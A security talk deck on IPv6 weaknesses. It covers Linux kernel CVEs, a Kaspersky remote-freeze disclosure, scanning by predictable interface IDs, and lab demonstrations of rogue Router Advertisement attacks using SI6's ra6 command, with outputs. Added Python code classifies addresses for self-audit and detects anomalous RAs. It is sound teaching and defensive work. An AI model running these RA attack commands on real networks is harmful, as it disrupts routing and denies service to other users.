IPv6 Security Potpourri
Matthias Schmidt @_xhr_
Why bother?
IPv4 in production since decades
IPv6 in production since ...
IPv6 is deployed alongside v4
Security Obstacles
Firewalls
IPS/IDS
Access Control Lists
VPNs
NACs
Blacklists
IPv6 maturity?
CVE-2013-4162
Flaw in setsockopt UDP_CORK option in the Linux kernel's IPv6 stack. A local user could exploit this flaw to cause a denial of service (system crash).
CVE-2013-2232
A flaw was discovered in the Linux kernel when an IPv6 socket is used to connect to an IPv4 destination. An unprivileged local user could exploit this flaw to cause a denial of service (system crash).
CVE-2013-4387
Flaw in the Linux kernel's UDP Fragmentation Offload (UFO). An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or possibly gain administrative privileges.
Date: Mon, 04 Mar 2013 07:01:10 +0100
From: Marc Heuse
To: fulldisclosure
Subject: Remote system freeze thanks to Kaspersky Internet
[...]
Kaspersky Internet Security 2013 (and any other Kaspersky product which includes the firewall functionality) is susceptible to a remote system freeze. As of the 3rd March 2013, the bug is still unfixed.
If IPv6 connectivity to a victim is possible (which is always the case on local networks), a fragmented packet with multiple but one large extension header leads to a complete freeze of the operating system.
[...]
IPv6 Privacy?
Multiple addresses per Interface
Happy Eyeballs
IPv4 only VPN
Host Tracking
Static prefix
Keep the security level balanced
New threats
... or not so new
Address Space Scanning
2^128 ... 2^64 ... 2^32
Exploit IIDs
Embedded MAC Address
2001:8d8:1fe:303:d6be:d9ff:fe60:dd7c
Embedded IPv4 Address
2001:db8:122:344::192.0.2.33
2001:db8:122:344::192:0:2:33
Low-byte address*
2a01:e0c:1::1
Wordy address*
2a03:2880:2110:3f07:face:b00c:0:1
Embedded port number
2001:4f8:3:7::25
Alexa T1M AAAA
24,145 IPv6 addresses in total
** IPv6 General Address Analysis **
Total IPv6 addresses: 24145
Unicast: 24141 (99.98%) Multicast: 0 (0.00%)
Unspec.: 4 (0.02%)
** IPv6 Unicast Addresses **
Loopback: 29 (0.12%) IPv4-mapped: 63 (0.26%)
IPv4-compat.: 6 (0.02%) Link-local: 19 (0.08%)
Site-local: 0 (0.00%) Unique-local: 0 (0.00%)
6to4: 137 (0.57%) Teredo: 0 (0.00%)
Global: 23887 (98.95%)
** IPv6 Interface IDs **
Total IIDs analyzed: 24043
IEEE-based: 127 (0.53%) Low-byte: 11680 (48.58%)
Embed-IPv4: 3914 (16.28%) Embed-IPv4 (64): 1156 (4.81%)
Embed-port: 407 (1.69%) Embed-port (r): 28 (0.12%)
ISATAP: 0 (0.00%) Byte-pattern: 4149 (17.26%)
Randomized: 2651 (11.03%)
Examples
$ host 2001:1900:2268:1:207:123:150:27
7.2.[...].ip6.arpa domain name pointer www.ncjrs.gov.
$ host 207.123.150.27
27.150.123.207 domain name pointer www.ncjrs.gov.
$ host 2001:8d8:0:5::18
8.1.[...].ip6.[...] ae-4.gw-diste.bs.kae.de.oneandone.net.
$ host 2001:4f8:3:7::25
5.2.[...].ip6.arpa domain name pointer mail.NetBSD.org.
$ host 2001:41b8:202:deb:213:21ff:fe20:1426
6.2.[...].arpa domain name pointer listera.torproject.org.
How to analyze?
addr6 from SI6 Networks
ieee
lowbyte
embedport
bytepattern...
ipv4all
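A simplified interface-ID classifier for auditing your own address plan against the patterns listed on the slides, as an added example (not addr6's code or its actual heuristics). The function names, the port list, the word list and the search-space figures are assumptions made for illustration.

```python
import ipaddress

# Assumed, illustrative lists (not taken from addr6).
SERVICE_PORTS = {21, 22, 25, 53, 80, 110, 143, 443, 993, 995}
HEX_WORDS = {"face", "b00c", "dead", "beef", "cafe", "babe", "c0de", "f00d"}
# Bits left to guess inside a known /64; "ieee" assumes the vendor OUI is known.
SEARCH_BITS = {"ieee": 24, "embed-ipv4": 32, "embed-ipv4-64": 32,
               "embed-port": 16, "low-byte": 16}

def _iid(addr):
    """Low 64 bits (the interface ID) of an IPv6 address, as an integer."""
    return int(ipaddress.IPv6Address(addr)) & (2**64 - 1)

def classify_iid(addr):
    iid = _iid(addr)
    groups = [(iid >> shift) & 0xFFFF for shift in (48, 32, 16, 0)]
    text = [format(g, "x") for g in groups]
    if (iid >> 24) & 0xFFFF == 0xFFFE:            # modified EUI-64: ff:fe in the middle
        return "ieee"
    if iid >> 32 == 0 and (iid >> 24) & 0xFF:     # ::192.0.2.33
        return "embed-ipv4"
    if groups[0] and all(t.isdigit() and int(t) <= 255 for t in text):
        return "embed-ipv4-64"                    # :192:0:2:33, one octet per group
    if iid >> 16 == 0:                            # only the last group is set
        if text[3].isdigit() and int(text[3]) in SERVICE_PORTS:
            return "embed-port"                   # ::25 on a mail server
        return "low-byte"
    if any(t in HEX_WORDS for t in text):
        return "wordy"
    return "other"

def mac_from_iid(addr):
    """Recover the MAC address from a modified EUI-64 interface ID."""
    b = _iid(addr).to_bytes(8, "big")
    mac = bytes([b[0] ^ 0x02]) + b[1:3] + b[5:8]  # flip U/L bit, drop ff:fe
    return ":".join(f"{x:02x}" for x in mac)

def audit(addrs):
    """Map each address to (class, bits an outsider still has to guess)."""
    return {a: (classify_iid(a), SEARCH_BITS.get(classify_iid(a), 64)) for a in addrs}

# Addresses shown on the slides.
SAMPLES = ["2001:8d8:1fe:303:d6be:d9ff:fe60:dd7c", "2001:db8:122:344::192.0.2.33",
           "2001:1900:2268:1:207:123:150:27", "2a01:e0c:1::1",
           "2a03:2880:2110:3f07:face:b00c:0:1", "2001:4f8:3:7::25"]

if __name__ == "__main__":
    for addr, (kind, bits) in audit(SAMPLES).items():
        print(f"{addr:40} {kind:14} 2^{bits}")
```

Anything that does not land in "other" is a candidate for renumbering or for randomized interface IDs.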
How to scan?
scan6 from SI6 Networks
IEEE OUIs
Embedded ports ...
Special IIDs
Malicious Hop Limit
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-
Router Advertisement Message Format
The default value that should be placed in the Hop Count field of the IP header for outgoing IP packets.
# ra6 -i em0 -s fe80::a00:27ff:fe9d:4980 -c 0 -v -d ff02::1 -l -z 1
Ethernet Source Address: 6b:88:4b:8a:d8:d3
Ethernet Destination Address: 33:33:00:00:00:01 (all-nodes multicast)
IPv6 Source Address: fe80::a00:27ff:fe9d:4980
IPv6 Destination Address: ff02::1
IPv6 Hop Limit: 255 (default)
Cur Hop Limit: 0 Preference: 1 Flags: none Router Lifetime: 9000
Reachable Time: 4294967295 Retrans Timer: 4000
Initial attack packet(s) sent successfully.
Now sending Router Advertisements every 1 second...
# ping6 fbsd
PING fbsd(fbsd) 56 data bytes
64 bytes from fbsd: icmp_seq=1 ttl=63 time=0.645 ms
64 bytes from fbsd: icmp_seq=2 ttl=63 time=0.795 ms
64 bytes from fbsd: icmp_seq=3 ttl=63 time=1.01 ms
From freebsdrouter icmp_seq=4 Time exceeded: Hop limit
[...]
Deactivate a Router
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-
Router Advertisement Message Format
A Lifetime of 0 indicates that the router is not a default router and SHOULD NOT appear on the default router's list
root@hipv6debianhost:~# ip -6 r s
fc00:1::/64 dev eth0 proto kernel metric 256 expires 2592155sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
default via fe80::a00:27ff:fe9d:4980 dev eth0 proto kernel metric 1024 expires 1793sec mtu 1500 advmss 1440 hoplimit 64
# ra6 -i em0 -s fe80::a00:27ff:fe9d:4980 -t 0 -v -d ff02::1
Ethernet Source Address: 05:70:d2:6e:2d:88
Ethernet Destination Address: 33:33:00:00:00:01 (all-nodes multicast)
IPv6 Source Address: fe80::a00:27ff:fe9d:4980
IPv6 Destination Address: ff02::1
IPv6 Hop Limit: 255 (default)
Cur Hop Limit: 255 Preference: 1 Flags: none Router Lifetime: 0
Reachable Time: 4294967295 Retrans Timer: 4000
Initial attack packet(s) sent successfully.
root@hipv6debianhost:~# ip -6 r s
fc00:1::/64 dev eth0 proto kernel metric 256 expires 2592056sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
Router Advertisement Flooding
# ra6 -i em0 -s fe80::a00:27ff:fe9d:4980 -c 0 -v -d ff02::1 -l -z 1
Ethernet Source Address: 6b:88:4b:8a:d8:d3
Ethernet Destination Address: 33:33:00:00:00:01 (all-nodes multicast)
IPv6 Source Address: fe80::a00:27ff:fe9d:4980
IPv6 Destination Address: ff02::1
IPv6 Hop Limit: 255 (default)
Cur Hop Limit: 0 Preference: 1 Flags: none Router Lifetime: 9000
Reachable Time: 4294967295 Retrans Timer: 4000
Initial attack packet(s) sent successfully.
Now sending Router Advertisements every 1 second...
root@hipv6debianhost:~# ip -6 r s
fc00:1::/64 dev eth0 proto kernel metric 256 expires 2591948sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
default via fe80::a00:27ff:fe9d:4980 dev eth0 proto kernel metric 1024 expires 1586sec mtu 1500 advmss 1440 hoplimit 64
default via fe80::e205:edce:9f12:5244 dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255
default via fe80::c989:7938:4241:9924 dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255
default via fe80::ba:74:aa4d:94d dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255
[...]
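Detection logic for the three Router Advertisement cases shown on the slides (changed Cur Hop Limit, Router Lifetime 0, many new default routers), as an added example that is not part of the original deck. The function names, the baseline Cur Hop Limit of 64 and the flood threshold are assumptions; the sample packets are constructed.

```python
import struct
from collections import namedtuple

RA = namedtuple("RA", "cur_hop_limit flags lifetime reachable retrans")

def parse_ra(icmp):
    """Parse the fixed 16-byte header of an ICMPv6 Router Advertisement."""
    if len(icmp) < 16:
        raise ValueError("truncated Router Advertisement")
    typ, code, _csum, hop, flags, life, reach, retrans = struct.unpack(
        "!BBHBBHII", icmp[:16])
    if typ != 134 or code != 0:
        raise ValueError("not a Router Advertisement")
    return RA(hop, flags, life, reach, retrans)

def check_ra(src, ip_hop_limit, icmp, routers, baseline_hop=64):
    """Return findings for one RA; an empty list means it matches the baseline.

    routers: link-local addresses of the legitimate routers (assumed known).
    baseline_hop: Cur Hop Limit those routers normally advertise (assumed 64).
    """
    if ip_hop_limit != 255:   # RFC 4861: receivers discard such RAs
        return ["ignored: IP Hop Limit is not 255, so the RA was forwarded"]
    ra = parse_ra(icmp)
    findings = []
    if src not in routers:
        findings.append(f"RA from unknown source {src}")
    if ra.cur_hop_limit != baseline_hop:
        findings.append(f"Cur Hop Limit {ra.cur_hop_limit}, baseline is {baseline_hop}")
    if ra.lifetime == 0 and src in routers:
        findings.append(f"Router Lifetime 0 removes default router {src}")
    return findings

def flood_suspected(sources, routers, limit=3):
    """True if one observation window holds more than `limit` unknown RA sources."""
    return len(set(sources) - set(routers)) > limit

# Constructed sample RAs (checksum left at 0; it is not verified here).
ROUTER = "fe80::a00:27ff:fe9d:4980"
SAMPLE_NORMAL = struct.pack("!BBHBBHII", 134, 0, 0, 64, 0, 1800, 0, 0)
SAMPLE_HOP = struct.pack("!BBHBBHII", 134, 0, 0, 0, 0, 9000, 4294967295, 4000)
SAMPLE_LIFETIME0 = struct.pack("!BBHBBHII", 134, 0, 0, 64, 0, 0, 4294967295, 4000)

if __name__ == "__main__":
    for name, pkt in [("normal", SAMPLE_NORMAL), ("hop limit", SAMPLE_HOP),
                      ("lifetime 0", SAMPLE_LIFETIME0)]:
        print(name, check_ra(ROUTER, 255, pkt, {ROUTER}))
```

Because the RAs on the slides carry the real router's source address, the source check alone does not catch them; the comparison against the advertised baseline does.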
Great Tools from great ppl
Fernando Gont: SI6 IPv6 toolkit
Van Hauser: THC IPv6 toolkit
Still a long way to go...
Fin!